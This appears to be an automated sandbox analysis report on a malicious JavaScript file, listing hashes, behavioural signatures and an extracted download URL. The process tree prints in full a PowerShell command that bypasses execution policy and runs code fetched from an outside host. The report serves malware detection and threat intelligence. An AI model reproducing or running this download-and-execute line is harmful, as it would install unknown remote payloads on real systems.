Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:21
Static task
static1
Behavioral task
behavioral1
Sample
5dc075fa21c26a577e957f0998567325360feac1724129cc597fa066a7732ae0.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
5dc075fa21c26a577e957f0998567325360feac1724129cc597fa066a7732ae0.js
Resource
win10v2004-20240226-en
General
-
Target
5dc075fa21c26a577e957f0998567325360feac1724129cc597fa066a7732ae0.js
-
Size
58KB
-
MD5
3564cec4227a927c5fbe75f6d7f16593
-
SHA1
d5d17ca63dae059091907d1d32b30bae5b66bd47
-
SHA256
5dc075fa21c26a577e957f0998567325360feac1724129cc597fa066a7732ae0
-
SHA512
f9cacdc4393e4d1f2fba97c2b35fb22ea7b428d603d9f1ba696ff0aee8fda0241ef3141bb4c7083d4e4d1f33e91fa9d682341fa01dbae886a76aef28993dcde3
-
SSDEEP
1536:DRqUVuL8zDZOcbTnzNIol0vcasq4BdhUGEYU:lqUV88XZOcbTnzNrlIcDq4BdOr
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 3028 powershell.exe 4 3028 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3028 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1808 wrote to memory of 3028 1808 wscript.exe 28 PID 1808 wrote to memory of 3028 1808 wscript.exe 28 PID 1808 wrote to memory of 3028 1808 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\5dc075fa21c26a577e957f0998567325360feac1724129cc597fa066a7732ae0.js1⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-